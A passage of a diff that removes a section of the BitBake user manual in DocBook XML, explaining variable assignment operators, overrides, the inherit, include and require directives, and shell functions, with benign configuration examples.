-                "${FOO}" as long as <filename>FOO</filename> does not exist.
-                <literallayout class='monospaced'>
-     BAR = "${FOO}"
-                </literallayout>
-            </para>
-        </section>
-
-        <section id='setting-a-default-value'>
-            <title>Setting a default value (?=)</title>
-
-            <para>
-                You can use the "?=" operator to achieve a "softer" assignment
-                for a variable.
-                This type of assignment allows you to define a variable if it
-                is undefined when the statement is parsed, but to leave the
-                value alone if the variable has a value.
-                Here is an example:
-                <literallayout class='monospaced'>
-     A ?= "aval"
-                </literallayout>
-                If <filename>A</filename> is set at the time this statement is parsed,
-                the variable retains its value.
-                However, if <filename>A</filename> is not set,
-                the variable is set to "aval".
-                <note>
-                    This assignment is immediate.
-                    Consequently, if multiple "?=" assignments
-                    to a single variable exist, the first of those ends up getting
-                    used.
-                </note>
-            </para>
-        </section>
-
-        <section id='setting-a-weak-default-value'>
-            <title>Setting a weak default value (??=)</title>
-
-            <para>
-                It is possible to use a "weaker" assignment than in the
-                previous section by using the "??=" operator.
-                This assignment behaves identical to "?=" except that the
-                assignment is made at the end of the parsing process rather
-                than immediately.
-                Consequently, when multiple "??=" assignments exist, the last
-                one is used.
-                Also, any "=" or "?=" assignment will override the value set with
-                "??=".
-                Here is an example:
-                <literallayout class='monospaced'>
-     A ??= "somevalue"
-     A ??= "someothervalue"
-                </literallayout>
-                If <filename>A</filename> is set before the above statements are parsed,
-                the variable retains its value.
-                If <filename>A</filename> is not set,
-                the variable is set to "someothervalue".
-            </para>
-
-            <para>
-                Again, this assignment is a "lazy" or "weak" assignment
-                because it does not occur until the end
-                of the parsing process.
-            </para>
-        </section>
-
-        <section id='immediate-variable-expansion'>
-            <title>Immediate variable expansion (:=)</title>
-
-            <para>
-                The ":=" operator results in a variable's
-                contents being expanded immediately,
-                rather than when the variable is actually used:
-                <literallayout class='monospaced'>
-     T = "123"
-     A := "test ${T}"
-     T = "456"
-     B := "${T} ${C}"
-     C = "cval"
-     C := "${C}append"
-                </literallayout>
-                In this example, <filename>A</filename> contains
-                "test 123", even though the final value of <filename>T</filename>
-                is "456".
-                The variable <filename>B</filename> will end up containing "456 cvalappend".
-                This is because references to undefined variables are preserved as is
-                during (immediate)expansion. This is in contrast to GNU Make, where undefined
-                variables expand to nothing.
-                The variable <filename>C</filename>
-                contains "cvalappend" since <filename>${C}</filename> immediately
-                expands to "cval".
-            </para>
-        </section>
-
-        <section id='appending-and-prepending'>
-            <title>Appending (+=) and prepending (=+) With Spaces</title>
-
-            <para>
-                Appending and prepending values is common and can be accomplished
-                using the "+=" and "=+" operators.
-                These operators insert a space between the current
-                value and prepended or appended value.
-            </para>
-
-            <para>
-                These operators take immediate effect during parsing.
-                Here are some examples:
-                <literallayout class='monospaced'>
-     B = "bval"
-     B += "additionaldata"
-     C = "cval"
-     C =+ "test"
-                </literallayout>
-                The variable <filename>B</filename> contains
-                "bval additionaldata" and <filename>C</filename>
-                contains "test cval".
-            </para>
-        </section>
-
-        <section id='appending-and-prepending-without-spaces'>
-            <title>Appending (.=) and Prepending (=.) Without Spaces</title>
-
-            <para>
-                If you want to append or prepend values without an
-                inserted space, use the ".=" and "=." operators.
-            </para>
-
-            <para>
-                These operators take immediate effect during parsing.
-                Here are some examples:
-                <literallayout class='monospaced'>
-     B = "bval"
-     B .= "additionaldata"
-     C = "cval"
-     C =. "test"
-                </literallayout>
-                The variable <filename>B</filename> contains
-                "bvaladditionaldata" and
-                <filename>C</filename> contains "testcval".
-            </para>
-        </section>
-
-        <section id='appending-and-prepending-override-style-syntax'>
-            <title>Appending and Prepending (Override Style Syntax)</title>
-
-            <para>
-                You can also append and prepend a variable's value
-                using an override style syntax.
-                When you use this syntax, no spaces are inserted.
-            </para>
-
-            <para>
-                These operators differ from the ":=", ".=", "=.", "+=", and "=+"
-                operators in that their effects are applied at variable
-                expansion time rather than being immediately applied.
-                Here are some examples:
-                <literallayout class='monospaced'>
-     B = "bval"
-     B_append = " additional data"
-     C = "cval"
-     C_prepend = "additional data "
-     D = "dval"
-     D_append = "additional data"
-                </literallayout>
-                The variable <filename>B</filename> becomes
-                "bval additional data" and <filename>C</filename> becomes
-                "additional data cval".
-                The variable <filename>D</filename> becomes
-                "dvaladditional data".
-                <note>
-                    You must control all spacing when you use the
-                    override syntax.
-                </note>
-            </para>
-
-            <para>
-                It is also possible to append and prepend to shell
-                functions and BitBake-style Python functions.
-                See the
-                "<link linkend='shell-functions'>Shell Functions</link>" and
-                "<link linkend='bitbake-style-python-functions'>BitBake-Style Python Functions</link>
-                sections for examples.
-            </para>
-        </section>
-
-        <section id='removing-override-style-syntax'>
-            <title>Removal (Override Style Syntax)</title>
-
-            <para>
-                You can remove values from lists using the removal
-                override style syntax.
-                Specifying a value for removal causes all occurrences of that
-                value to be removed from the variable.
-            </para>
-
-            <para>
-                When you use this syntax, BitBake expects one or more strings.
-                Surrounding spaces and spacing are preserved.
-                Here is an example:
-                <literallayout class='monospaced'>
-     FOO = "123 456 789 123456 123 456 123 456"
-     FOO_remove = "123"
-     FOO_remove = "456"
-     FOO2 = " abc  def ghi abcdef abc def abc  def def"
-     FOO2_remove = " \
-         def \
-         abc \
-         ghi \
-     "
-                </literallayout>
-                The variable <filename>FOO</filename> becomes
-                "&nbsp;&nbsp;789&nbsp;123456&nbsp;&nbsp;&nbsp;&nbsp;"
-                and <filename>FOO2</filename> becomes
-                "&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;abcdef&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;".
-            </para>
-
-            <para>
-                Like "_append" and "_prepend", "_remove"
-                is applied at variable expansion time.
-            </para>
-        </section>
-
-        <section id='override-style-operation-advantages'>
-            <title>Override Style Operation Advantages</title>
-
-            <para>
-                An advantage of the override style operations
-                "_append", "_prepend", and "_remove" as compared to the
-                "+=" and "=+" operators is that the override style
-                operators provide guaranteed operations.
-                For example, consider a class <filename>foo.bbclass</filename>
-                that needs to add the value "val" to the variable
-                <filename>FOO</filename>, and a recipe that uses
-                <filename>foo.bbclass</filename> as follows:
-                <literallayout class='monospaced'>
-     inherit foo
-
-     FOO = "initial"
-                </literallayout>
-                If <filename>foo.bbclass</filename> uses the "+=" operator,
-                as follows, then the final value of <filename>FOO</filename>
-                will be "initial", which is not what is desired:
-                <literallayout class='monospaced'>
-     FOO += "val"
-                </literallayout>
-                If, on the other hand, <filename>foo.bbclass</filename>
-                uses the "_append" operator, then the final value of
-                <filename>FOO</filename> will be "initial val", as intended:
-                <literallayout class='monospaced'>
-     FOO_append = " val"
-                </literallayout>
-                <note>
-                    It is never necessary to use "+=" together with "_append".
-                    The following sequence of assignments appends "barbaz" to
-                    <filename>FOO</filename>:
-                    <literallayout class='monospaced'>
-     FOO_append = "bar"
-     FOO_append = "baz"
-                    </literallayout>
-                    The only effect of changing the second assignment in the
-                    previous example to use "+=" would be to add a space before
-                    "baz" in the appended value (due to how the "+=" operator
-                    works).
-                </note>
-                Another advantage of the override style operations is that
-                you can combine them with other overrides as described in the
-                "<link linkend='conditional-syntax-overrides'>Conditional Syntax (Overrides)</link>"
-                section.
-            </para>
-        </section>
-
-        <section id='variable-flag-syntax'>
-            <title>Variable Flag Syntax</title>
-
-            <para>
-                Variable flags are BitBake's implementation of variable properties
-                or attributes.
-                It is a way of tagging extra information onto a variable.
-                You can find more out about variable flags in general in the
-                "<link linkend='variable-flags'>Variable Flags</link>"
-                section.
-            </para>
-
-            <para>
-                You can define, append, and prepend values to variable flags.
-                All the standard syntax operations previously mentioned work
-                for variable flags except for override style syntax
-                (i.e. "_prepend", "_append", and "_remove").
-            </para>
-
-            <para>
-                Here are some examples showing how to set variable flags:
-                <literallayout class='monospaced'>
-     FOO[a] = "abc"
-     FOO[b] = "123"
-     FOO[a] += "456"
-                </literallayout>
-                The variable <filename>FOO</filename> has two flags:
-                <filename>[a]</filename> and <filename>[b]</filename>.
-                The flags are immediately set to "abc" and "123", respectively.
-                The <filename>[a]</filename> flag becomes "abc 456".
-            </para>
-
-            <para>
-                No need exists to pre-define variable flags.
-                You can simply start using them.
-                One extremely common application
-                is to attach some brief documentation to a BitBake variable as
-                follows:
-                <literallayout class='monospaced'>
-     CACHE[doc] = "The directory holding the cache of the metadata."
-                </literallayout>
-            </para>
-        </section>
-
-        <section id='inline-python-variable-expansion'>
-            <title>Inline Python Variable Expansion</title>
-
-            <para>
-                You can use inline Python variable expansion to
-                set variables.
-                Here is an example:
-                <literallayout class='monospaced'>
-     DATE = "${@time.strftime('%Y%m%d',time.gmtime())}"
-                </literallayout>
-                This example results in the <filename>DATE</filename>
-                variable being set to the current date.
-            </para>
-
-            <para>
-                Probably the most common use of this feature is to extract
-                the value of variables from BitBake's internal data dictionary,
-                <filename>d</filename>.
-                The following lines select the values of a package name
-                and its version number, respectively:
-                <literallayout class='monospaced'>
-     PN = "${@bb.parse.BBHandler.vars_from_file(d.getVar('FILE', False),d)[0] or 'defaultpkgname'}"
-     PV = "${@bb.parse.BBHandler.vars_from_file(d.getVar('FILE', False),d)[1] or '1.0'}"
-                </literallayout>
-                <note>
-                    Inline Python expressions work just like variable expansions
-                    insofar as the "=" and ":=" operators are concerned.
-                    Given the following assignment, <filename>foo()</filename>
-                    is called each time <filename>FOO</filename> is expanded:
-                    <literallayout class='monospaced'>
-     FOO = "${@foo()}"
-                    </literallayout>
-                    Contrast this with the following immediate assignment, where
-                    <filename>foo()</filename> is only called once, while the
-                    assignment is parsed:
-                    <literallayout class='monospaced'>
-     FOO := "${@foo()}"
-                    </literallayout>
-                </note>
-                For a different way to set variables with Python code during
-                parsing, see the
-                "<link linkend='anonymous-python-functions'>Anonymous Python Functions</link>"
-                section.
-            </para>
-        </section>
-
-        <section id='unsetting-variables'>
-            <title>Unsetting variables</title>
-
-            <para>
-                It is possible to completely remove a variable or a variable flag
-                from BitBake's internal data dictionary by using the "unset" keyword.
-                Here is an example:
-                <literallayout class='monospaced'>
-        unset DATE
-        unset do_fetch[noexec]
-                </literallayout>
-                These two statements remove the <filename>DATE</filename> and the
-                <filename>do_fetch[noexec]</filename> flag.
-            </para>
-
-        </section>
-
-        <section id='providing-pathnames'>
-            <title>Providing Pathnames</title>
-
-            <para>
-                When specifying pathnames for use with BitBake,
-                do not use the tilde ("~") character as a shortcut
-                for your home directory.
-                Doing so might cause BitBake to not recognize the
-                path since BitBake does not expand this character in
-                the same way a shell would.
-            </para>
-
-            <para>
-                Instead, provide a fuller path as the following
-                example illustrates:
-                <literallayout class='monospaced'>
-     BBLAYERS ?= " \
-       /home/scott-lenovo/LayerA \
-       "
-                </literallayout>
-            </para>
-        </section>
-    </section>
-
-    <section id='exporting-variables-to-the-environment'>
-        <title>Exporting Variables to the Environment</title>
-
-        <para>
-            You can export variables to the environment of running
-            tasks by using the <filename>export</filename> keyword.
-            For example, in the following example, the
-            <filename>do_foo</filename> task prints "value from
-            the environment" when run:
-            <literallayout class='monospaced'>
-     export ENV_VARIABLE
-     ENV_VARIABLE = "value from the environment"
-
-     do_foo() {
-         bbplain "$ENV_VARIABLE"
-     }
-            </literallayout>
-            <note>
-                BitBake does not expand <filename>$ENV_VARIABLE</filename>
-                in this case because it lacks the obligatory
-                <filename>{}</filename>.
-                Rather, <filename>$ENV_VARIABLE</filename> is expanded
-                by the shell.
-            </note>
-            It does not matter whether
-            <filename>export ENV_VARIABLE</filename> appears before or
-            after assignments to <filename>ENV_VARIABLE</filename>.
-        </para>
-
-        <para>
-            It is also possible to combine <filename>export</filename>
-            with setting a value for the variable.
-            Here is an example:
-            <literallayout class='monospaced'>
-     export ENV_VARIABLE = "<replaceable>variable-value</replaceable>"
-            </literallayout>
-            In the output of <filename>bitbake -e</filename>, variables
-            that are exported to the environment are preceded by "export".
-        </para>
-
-        <para>
-            Among the variables commonly exported to the environment
-            are <filename>CC</filename> and <filename>CFLAGS</filename>,
-            which are picked up by many build systems.
-        </para>
-    </section>
-
-    <section id='conditional-syntax-overrides'>
-        <title>Conditional Syntax (Overrides)</title>
-
-        <para>
-            BitBake uses
-            <link linkend='var-bb-OVERRIDES'><filename>OVERRIDES</filename></link>
-            to control what variables are overridden after BitBake
-            parses recipes and configuration files.
-            This section describes how you can use
-            <filename>OVERRIDES</filename> as conditional metadata,
-            talks about key expansion in relationship to
-            <filename>OVERRIDES</filename>, and provides some examples
-            to help with understanding.
-        </para>
-
-        <section id='conditional-metadata'>
-            <title>Conditional Metadata</title>
-
-            <para>
-                You can use <filename>OVERRIDES</filename> to conditionally select
-                a specific version of a variable and to conditionally
-                append or prepend the value of a variable.
-                <note>
-                    Overrides can only use lower-case characters.
-                    Additionally, underscores are not permitted in override names
-                    as they are used to separate overrides from each other and
-                    from the variable name.
-                </note>
-                <itemizedlist>
-                    <listitem><para><emphasis>Selecting a Variable:</emphasis>
-                        The <filename>OVERRIDES</filename> variable is
-                        a colon-character-separated list that contains items
-                        for which you want to satisfy conditions.
-                        Thus, if you have a variable that is conditional on “arm�, and “arm�
-                        is in <filename>OVERRIDES</filename>, then the “arm�-specific
-                        version of the variable is used rather than the non-conditional
-                        version.
-                        Here is an example:
-                        <literallayout class='monospaced'>
-     OVERRIDES = "architecture:os:machine"
-     TEST = "default"
-     TEST_os = "osspecific"
-     TEST_nooverride = "othercondvalue"
-                        </literallayout>
-                        In this example, the <filename>OVERRIDES</filename>
-                        variable lists three overrides:
-                        "architecture", "os", and "machine".
-                        The variable <filename>TEST</filename> by itself has a default
-                        value of "default".
-                        You select the os-specific version of the <filename>TEST</filename>
-                        variable by appending the "os" override to the variable
-                        (i.e.<filename>TEST_os</filename>).
-                        </para>
-
-                        <para>
-                            To better understand this, consider a practical example
-                            that assumes an OpenEmbedded metadata-based Linux
-                            kernel recipe file.
-                            The following lines from the recipe file first set
-                            the kernel branch variable <filename>KBRANCH</filename>
-                            to a default value, then conditionally override that
-                            value based on the architecture of the build:
-                        <literallayout class='monospaced'>
-     KBRANCH = "standard/base"
-     KBRANCH_qemuarm  = "standard/arm-versatile-926ejs"
-     KBRANCH_qemumips = "standard/mti-malta32"
-     KBRANCH_qemuppc  = "standard/qemuppc"
-     KBRANCH_qemux86  = "standard/common-pc/base"
-     KBRANCH_qemux86-64  = "standard/common-pc-64/base"
-     KBRANCH_qemumips64 = "standard/mti-malta64"
-                        </literallayout>
-                        </para></listitem>
-                    <listitem><para><emphasis>Appending and Prepending:</emphasis>
-                        BitBake also supports append and prepend operations to
-                        variable values based on whether a specific item is
-                        listed in <filename>OVERRIDES</filename>.
-                        Here is an example:
-                        <literallayout class='monospaced'>
-     DEPENDS = "glibc ncurses"
-     OVERRIDES = "machine:local"
-     DEPENDS_append_machine = " libmad"
-                        </literallayout>
-                        In this example, <filename>DEPENDS</filename> becomes
-                        "glibc ncurses libmad".
-                        </para>
-
-                        <para>
-                            Again, using an OpenEmbedded metadata-based
-                            kernel recipe file as an example, the
-                            following lines will conditionally append to the
-                            <filename>KERNEL_FEATURES</filename> variable based
-                            on the architecture:
-                        <literallayout class='monospaced'>
-     KERNEL_FEATURES_append = " ${KERNEL_EXTRA_FEATURES}"
-     KERNEL_FEATURES_append_qemux86=" cfg/sound.scc cfg/paravirt_kvm.scc"
-     KERNEL_FEATURES_append_qemux86-64=" cfg/sound.scc cfg/paravirt_kvm.scc"
-                        </literallayout>
-                        </para></listitem>
-                    <listitem><para><emphasis>Setting a Variable for a Single Task:</emphasis>
-                        BitBake supports setting a variable just for the
-                        duration of a single task.
-                        Here is an example:
-                        <literallayout class='monospaced'>
-     FOO_task-configure = "val 1"
-     FOO_task-compile = "val 2"
-                        </literallayout>
-                        In the previous example, <filename>FOO</filename>
-                        has the value "val 1" while the
-                        <filename>do_configure</filename> task is executed,
-                        and the value "val 2" while the
-                        <filename>do_compile</filename> task is executed.
-                        </para>
-
-                        <para>Internally, this is implemented by prepending
-                        the task (e.g. "task-compile:") to the value of
-                        <link linkend='var-bb-OVERRIDES'><filename>OVERRIDES</filename></link>
-                        for the local datastore of the <filename>do_compile</filename>
-                        task.</para>
-
-                        <para>You can also use this syntax with other combinations
-                        (e.g. "<filename>_prepend</filename>") as shown in the
-                        following example:
-                        <literallayout class='monospaced'>
-     EXTRA_OEMAKE_prepend_task-compile = "${PARALLEL_MAKE} "
-                        </literallayout>
-                        </para></listitem>
-                </itemizedlist>
-            </para>
-        </section>
-
-        <section id='key-expansion'>
-            <title>Key Expansion</title>
-
-            <para>
-                Key expansion happens when the BitBake datastore is finalized.
-                To better understand this, consider the following example:
-                <literallayout class='monospaced'>
-     A${B} = "X"
-     B = "2"
-     A2 = "Y"
-                </literallayout>
-                In this case, after all the parsing is complete,
-                BitBake expands <filename>${B}</filename> into "2".
-                This expansion causes <filename>A2</filename>, which was
-                set to "Y" before the expansion, to become "X".
-            </para>
-        </section>
-
-        <section id='variable-interaction-worked-examples'>
-            <title>Examples</title>
-
-            <para>
-                Despite the previous explanations that show the different forms of
-                variable definitions, it can be hard to work
-                out exactly what happens when variable operators, conditional
-                overrides, and unconditional overrides are combined.
-                This section presents some common scenarios along
-                with explanations for variable interactions that
-                typically confuse users.
-            </para>
-
-            <para>
-                There is often confusion concerning the order in which
-                overrides and various "append" operators take effect.
-                Recall that an append or prepend operation using "_append"
-                and "_prepend" does not result in an immediate assignment
-                as would "+=", ".=", "=+", or "=.".
-                Consider the following example:
-                <literallayout class='monospaced'>
-     OVERRIDES = "foo"
-     A = "Z"
-     A_foo_append = "X"
-                </literallayout>
-                For this case, <filename>A</filename> is
-                unconditionally set to "Z" and "X" is
-                unconditionally and immediately appended to the variable
-                <filename>A_foo</filename>.
-                Because overrides have not been applied yet,
-                <filename>A_foo</filename> is set to "X" due to the append
-                and <filename>A</filename> simply equals "Z".
-            </para>
-
-            <para>
-                Applying overrides, however, changes things.
-                Since "foo" is listed in <filename>OVERRIDES</filename>,
-                the conditional variable <filename>A</filename> is replaced
-                with the "foo" version, which is equal to "X".
-                So effectively, <filename>A_foo</filename> replaces <filename>A</filename>.
-            </para>
-
-            <para>
-                This next example changes the order of the override and
-                the append:
-                <literallayout class='monospaced'>
-     OVERRIDES = "foo"
-     A = "Z"
-     A_append_foo = "X"
-                </literallayout>
-                For this case, before overrides are handled,
-                <filename>A</filename> is set to "Z" and <filename>A_append_foo</filename>
-                is set to "X".
-                Once the override for "foo" is applied, however,
-                <filename>A</filename> gets appended with "X".
-                Consequently, <filename>A</filename> becomes "ZX".
-                Notice that spaces are not appended.
-            </para>
-
-            <para>
-                This next example has the order of the appends and overrides reversed
-                back as in the first example:
-                <literallayout class='monospaced'>
-     OVERRIDES = "foo"
-     A = "Y"
-     A_foo_append = "Z"
-     A_foo_append = "X"
-                </literallayout>
-                For this case, before any overrides are resolved,
-                <filename>A</filename> is set to "Y" using an immediate assignment.
-                After this immediate assignment, <filename>A_foo</filename> is set
-                to "Z", and then further appended with
-                "X" leaving the variable set to "ZX".
-                Finally, applying the override for "foo" results in the conditional
-                variable <filename>A</filename> becoming "ZX" (i.e.
-                <filename>A</filename> is replaced with <filename>A_foo</filename>).
-            </para>
-
-            <para>
-                This final example mixes in some varying operators:
-                <literallayout class='monospaced'>
-     A = "1"
-     A_append = "2"
-     A_append = "3"
-     A += "4"
-     A .= "5"
-                </literallayout>
-                For this case, the type of append operators are affecting the
-                order of assignments as BitBake passes through the code
-                multiple times.
-                Initially, <filename>A</filename> is set to "1 45" because
-                of the three statements that use immediate operators.
-                After these assignments are made, BitBake applies the
-                "_append" operations.
-                Those operations result in <filename>A</filename> becoming "1 4523".
-            </para>
-        </section>
-    </section>
-
-    <section id='sharing-functionality'>
-        <title>Sharing Functionality</title>
-
-        <para>
-            BitBake allows for metadata sharing through include files
-            (<filename>.inc</filename>) and class files
-            (<filename>.bbclass</filename>).
-            For example, suppose you have a piece of common functionality
-            such as a task definition that you want to share between
-            more than one recipe.
-            In this case, creating a <filename>.bbclass</filename>
-            file that contains the common functionality and then using
-            the <filename>inherit</filename> directive in your recipes to
-            inherit the class would be a common way to share the task.
-        </para>
-
-        <para>
-            This section presents the mechanisms BitBake provides to
-            allow you to share functionality between recipes.
-            Specifically, the mechanisms include <filename>include</filename>,
-            <filename>inherit</filename>, <filename>INHERIT</filename>, and
-            <filename>require</filename> directives.
-        </para>
-
-        <section id='locating-include-and-class-files'>
-            <title>Locating Include and Class Files</title>
-
-            <para>
-                BitBake uses the
-                <link linkend='var-bb-BBPATH'><filename>BBPATH</filename></link>
-                variable to locate needed include and class files.
-                Additionally, BitBake searches the current directory for
-                <filename>include</filename> and <filename>require</filename>
-                directives.
-                <note>
-                    The <filename>BBPATH</filename> variable is analogous to
-                    the environment variable <filename>PATH</filename>.
-                </note>
-            </para>
-
-            <para>
-                In order for include and class files to be found by BitBake,
-                they need to be located in a "classes" subdirectory that can
-                be found in <filename>BBPATH</filename>.
-            </para>
-        </section>
-
-        <section id='inherit-directive'>
-            <title><filename>inherit</filename> Directive</title>
-
-            <para>
-                When writing a recipe or class file, you can use the
-                <filename>inherit</filename> directive to inherit the
-                functionality of a class (<filename>.bbclass</filename>).
-                BitBake only supports this directive when used within recipe
-                and class files (i.e. <filename>.bb</filename> and
-                <filename>.bbclass</filename>).
-            </para>
-
-            <para>
-                The <filename>inherit</filename> directive is a rudimentary
-                means of specifying functionality contained in class files
-                that your recipes require.
-                For example, you can easily abstract out the tasks involved in
-                building a package that uses Autoconf and Automake and put
-                those tasks into a class file and then have your recipe
-                inherit that class file.
-            </para>
-
-            <para>
-                As an example, your recipes could use the following directive
-                to inherit an <filename>autotools.bbclass</filename> file.
-                The class file would contain common functionality for using
-                Autotools that could be shared across recipes:
-                <literallayout class='monospaced'>
-     inherit autotools
-                </literallayout>
-                In this case, BitBake would search for the directory
-                <filename>classes/autotools.bbclass</filename>
-                in <filename>BBPATH</filename>.
-                <note>
-                    You can override any values and functions of the
-                    inherited class within your recipe by doing so
-                    after the "inherit" statement.
-                </note>
-                If you want to use the directive to inherit
-                multiple classes, separate them with spaces.
-                The following example shows how to inherit both the
-                <filename>buildhistory</filename> and <filename>rm_work</filename>
-                classes:
-                <literallayout class='monospaced'>
-     inherit buildhistory rm_work
-                </literallayout>
-            </para>
-
-            <para>
-                An advantage with the inherit directive as compared to both
-                the
-                <link linkend='include-directive'>include</link> and
-                <link linkend='require-inclusion'>require</link> directives
-                is that you can inherit class files conditionally.
-                You can accomplish this by using a variable expression
-                after the <filename>inherit</filename> statement.
-                Here is an example:
-                <literallayout class='monospaced'>
-     inherit ${VARNAME}
-                </literallayout>
-                If <filename>VARNAME</filename> is going to be set, it needs
-                to be set before the <filename>inherit</filename> statement
-                is parsed.
-                One way to achieve a conditional inherit in this case is to use
-                overrides:
-                <literallayout class='monospaced'>
-     VARIABLE = ""
-     VARIABLE_someoverride = "myclass"
-                </literallayout>
-            </para>
-
-            <para>
-                Another method is by using anonymous Python.
-                Here is an example:
-                <literallayout class='monospaced'>
-     python () {
-         if condition == value:
-             d.setVar('VARIABLE', 'myclass')
-         else:
-             d.setVar('VARIABLE', '')
-     }
-                </literallayout>
-            </para>
-
-            <para>
-                Alternatively, you could use an in-line Python expression
-                in the following form:
-                <literallayout class='monospaced'>
-     inherit ${@'classname' if condition else ''}
-     inherit ${@functionname(params)}
-                </literallayout>
-                In all cases, if the expression evaluates to an empty
-                string, the statement does not trigger a syntax error
-                because it becomes a no-op.
-            </para>
-        </section>
-
-        <section id='include-directive'>
-            <title><filename>include</filename> Directive</title>
-
-            <para>
-                BitBake understands the <filename>include</filename>
-                directive.
-                This directive causes BitBake to parse whatever file you specify,
-                and to insert that file at that location.
-                The directive is much like its equivalent in Make except
-                that if the path specified on the include line is a relative
-                path, BitBake locates the first file it can find
-                within <filename>BBPATH</filename>.
-            </para>
-
-            <para>
-                The include directive is a more generic method of including
-                functionality as compared to the
-                <link linkend='inherit-directive'>inherit</link> directive,
-                which is restricted to class (i.e. <filename>.bbclass</filename>)
-                files.
-                The include directive is applicable for any other kind of
-                shared or encapsulated functionality or configuration that
-                does not suit a <filename>.bbclass</filename> file.
-            </para>
-
-            <para>
-                As an example, suppose you needed a recipe to include some
-                self-test definitions:
-                <literallayout class='monospaced'>
-     include test_defs.inc
-                </literallayout>
-                <note>
-                    The <filename>include</filename> directive does not
-                    produce an error when the file cannot be found.
-                    Consequently, it is recommended that if the file you
-                    are including is expected to exist, you should use
-                    <link linkend='require-inclusion'><filename>require</filename></link>
-                    instead of <filename>include</filename>.
-                    Doing so makes sure that an error is produced if the
-                    file cannot be found.
-                </note>
-            </para>
-        </section>
-
-        <section id='require-inclusion'>
-            <title><filename>require</filename> Directive</title>
-
-            <para>
-                BitBake understands the <filename>require</filename>
-                directive.
-                This directive behaves just like the
-                <filename>include</filename> directive with the exception that
-                BitBake raises a parsing error if the file to be included cannot
-                be found.
-                Thus, any file you require is inserted into the file that is
-                being parsed at the location of the directive.
-            </para>
-
-            <para>
-                The require directive, like the include directive previously
-                described, is a more generic method of including
-                functionality as compared to the
-                <link linkend='inherit-directive'>inherit</link> directive,
-                which is restricted to class (i.e. <filename>.bbclass</filename>)
-                files.
-                The require directive is applicable for any other kind of
-                shared or encapsulated functionality or configuration that
-                does not suit a <filename>.bbclass</filename> file.
-            </para>
-
-            <para>
-                Similar to how BitBake handles
-                <link linkend='include-directive'><filename>include</filename></link>,
-                if the path specified
-                on the require line is a relative path, BitBake locates
-                the first file it can find within <filename>BBPATH</filename>.
-            </para>
-
-            <para>
-                As an example, suppose you have two versions of a recipe
-                (e.g. <filename>foo_1.2.2.bb</filename> and
-                <filename>foo_2.0.0.bb</filename>) where
-                each version contains some identical functionality that could be
-                shared.
-                You could create an include file named <filename>foo.inc</filename>
-                that contains the common definitions needed to build "foo".
-                You need to be sure <filename>foo.inc</filename> is located in the
-                same directory as your two recipe files as well.
-                Once these conditions are set up, you can share the functionality
-                using a <filename>require</filename> directive from within each
-                recipe:
-                <literallayout class='monospaced'>
-     require foo.inc
-                </literallayout>
-            </para>
-        </section>
-
-        <section id='inherit-configuration-directive'>
-            <title><filename>INHERIT</filename> Configuration Directive</title>
-
-            <para>
-                When creating a configuration file (<filename>.conf</filename>),
-                you can use the
-                <link linkend='var-bb-INHERIT'><filename>INHERIT</filename></link>
-                configuration directive to inherit a class.
-                BitBake only supports this directive when used within
-                a configuration file.
-            </para>
-
-            <para>
-                As an example, suppose you needed to inherit a class
-                file called <filename>abc.bbclass</filename> from a
-                configuration file as follows:
-                <literallayout class='monospaced'>
-     INHERIT += "abc"
-                </literallayout>
-                This configuration directive causes the named
-                class to be inherited at the point of the directive
-                during parsing.
-                As with the <filename>inherit</filename> directive, the
-                <filename>.bbclass</filename> file must be located in a
-                "classes" subdirectory in one of the directories specified
-                in <filename>BBPATH</filename>.
-                <note>
-                    Because <filename>.conf</filename> files are parsed
-                    first during BitBake's execution, using
-                    <filename>INHERIT</filename> to inherit a class effectively
-                    inherits the class globally (i.e. for all recipes).
-                </note>
-                If you want to use the directive to inherit
-                multiple classes, you can provide them on the same line in the
-                <filename>local.conf</filename> file.
-                Use spaces to separate the classes.
-                The following example shows how to inherit both the
-                <filename>autotools</filename> and <filename>pkgconfig</filename>
-                classes:
-                <literallayout class='monospaced'>
-     INHERIT += "autotools pkgconfig"
-                </literallayout>
-            </para>
-        </section>
-    </section>
-
-    <section id='functions'>
-        <title>Functions</title>
-
-        <para>
-            As with most languages, functions are the building blocks that
-            are used to build up operations into tasks.
-            BitBake supports these types of functions:
-            <itemizedlist>
-                <listitem><para><emphasis>Shell Functions:</emphasis>
-                    Functions written in shell script and executed either
-                    directly as functions, tasks, or both.
-                    They can also be called by other shell functions.
-                    </para></listitem>
-                <listitem><para><emphasis>BitBake-Style Python Functions:</emphasis>
-                    Functions written in Python and executed by BitBake or other
-                    Python functions using <filename>bb.build.exec_func()</filename>.
-                    </para></listitem>
-                <listitem><para><emphasis>Python Functions:</emphasis>
-                    Functions written in Python and executed by Python.
-                    </para></listitem>
-                <listitem><para><emphasis>Anonymous Python Functions:</emphasis>
-                    Python functions executed automatically during
-                    parsing.
-                    </para></listitem>
-            </itemizedlist>
-            Regardless of the type of function, you can only
-            define them in class (<filename>.bbclass</filename>)
-            and recipe (<filename>.bb</filename> or <filename>.inc</filename>)
-            files.
-        </para>
-
-        <section id='shell-functions'>
-            <title>Shell Functions</title>
-
-            <para>
-                Functions written in shell script and executed either
-                directly as functions, tasks, or both.
-                They can also be called by other shell functions.
-                Here is an example shell function definition:
-                <literallayout class='monospaced'>
-     some_function () {
-         echo "Hello World"
-     }
-                </literallayout>
-                When you create these types of functions in your recipe
-                or class files, you need to follow the shell programming
-                rules.
-                The scripts are executed by <filename>/bin/sh</filename>,
-                which may not be a bash shell but might be something
-                such as <filename>dash</filename>.
-                You should not use Bash-specific script (bashisms).
-            </para>
-
-            <para>
-                Overrides and override-style operators like
-                <filename>_append</filename> and
-                <filename>_prepend</filename> can also be applied to
-                shell functions.
-                Most commonly, this application would be used in a
-                <filename>.bbappend</filename> file to modify functions in
-                the main recipe.
-                It can also be used to modify functions inherited from
-                classes.
-            </para>
-
-            <para>
-                As an example, consider the following:
-                <literallayout class='monospaced'>
-     do_foo() {
-         bbplain first
-         fn
-     }
-
-     fn_prepend() {
-         bbplain second
-     }
-
-     fn() {
-         bbplain third
-     }
-
-     do_foo_append() {
-         bbplain fourth
-     }
-                </literallayout>
-                Running <filename>do_foo</filename>
-                prints the following:
-                <literallayout class='monospaced'>
-     recipename do_foo: first
-     recipename do_foo: second
-     recipename do_foo: third
-     recipename do_foo: fourth
-                </literallayout>
-                <note>
-                    Overrides and override-style operators can
-                    be applied to any shell function, not just
-                    <link linkend='tasks'>tasks</link>.
-                </note>
-                You can use the <filename>bitbake -e</filename>&nbsp;<replaceable>recipename</replaceable>
-                command to view the final assembled function
